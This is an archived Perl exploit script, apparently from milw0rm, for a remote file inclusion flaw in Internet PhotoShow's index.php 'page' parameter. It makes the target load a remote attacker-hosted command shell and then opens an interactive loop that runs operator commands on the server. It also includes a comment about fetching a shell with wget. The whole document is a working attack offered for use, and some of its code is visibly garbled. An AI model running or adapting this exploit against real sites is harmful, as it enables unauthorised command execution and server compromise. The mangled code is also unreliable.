Internet PhotoShow (page) Remote File Inclusion Exploit :

Date : 2006-04-18 Author : Hessam-x
#!/usr/bin/perl
#
# Exploit by Hessam-x (www.hessamx.net)
# sub usage()
# {
 #print " Usage: perl hx.pl [host] [cmd shell] [cmd shell variable]

";
 #print " example : perl hx.pl www.milw0rm.com milw0rm.com/hx.txt cmd";
 #exit();
 #}
######################################################
#  ___ ___                __                         #
# /   |   \_____    ____ |  | __ ___________________ #
#/    ~    \__   _/ ___|  |/ // __ \_  __ \___   / #
#    Y    // __ \  \___|    <  ___/|  | //    /  #
# \___|_  /(____  )\___  >__|_ \___  >__|  /_____  #
#       /      /     /     /    /            / #
#             Iran Hackerz Security Team             #
#               WebSite: www.hackerz.ir              #
#                 DeltaHAcking Team                  #
#           website: www.deltahacking.com            #
######################################################
#  Internet PhotoShow Remote File Inclusion Exploit  #
######################################################
# upload a shell with this xpl:
# wget http://shell location/
use LWP::UserAgent;
print "-------------------------------------------
";
print "=             Internet PhotoShow          =
";
print "=       By Hessam-x  - www.hackerz.ir     =
";
print "-------------------------------------------

";


$bPath = $ARGV[0];
$cmdo = $ARGV[1];
$bcmd = $ARGV[2];

if($bPath!~/http:/// || $cmdo!~/http:/// || !$bcmd){usage()}



while()
{
       print "Hessam-x@PhotoShow $";
while(<STDIN>)
       {
               $cmd=$_;
               chomp($cmd);

$xpl = LWP::UserAgent->new() or die;
$req = HTTP::Request->new(GET =>$bpath.'index.php?page='.$cmdo.'?&'.$bcmd.'='.$cmd)or die "
[-] Could not connect !
";

$res = $xpl->request($req);

$return = $res->content;
$return =~ tr/[
]/[]/;

if (!$cmd) {print "
[!] Please type a Command

"; $return ="";}

elsif ($return =~/failed to open stream: HTTP request failed!/)
       {print "
[-] Could Not Connect to cmd Host
";exit}
elsif ($return =~/^<b>Fatal.error/) {print "
[-] Invalid Command
"}

if($return =~ /(.*)/)


{
       $freturn = $1;
       $freturn=~ tr/[]/[
]/;
       print "
$freturn

";
       last;
}

else {print "Hessam-x@PhotoShow $";}}}last;


sub usage()
 {
print "[!] Usage : hx.pl [host] [cmd shell location] [cmd shell variable]
";
print " - E.g : hx.pl http://www.milw0rm.com http://www.milw0rm.com/shell.txt cmd
";
 exit();
 }

# milw0rm.com [2006-04-18]

C1

 

C2

 

C3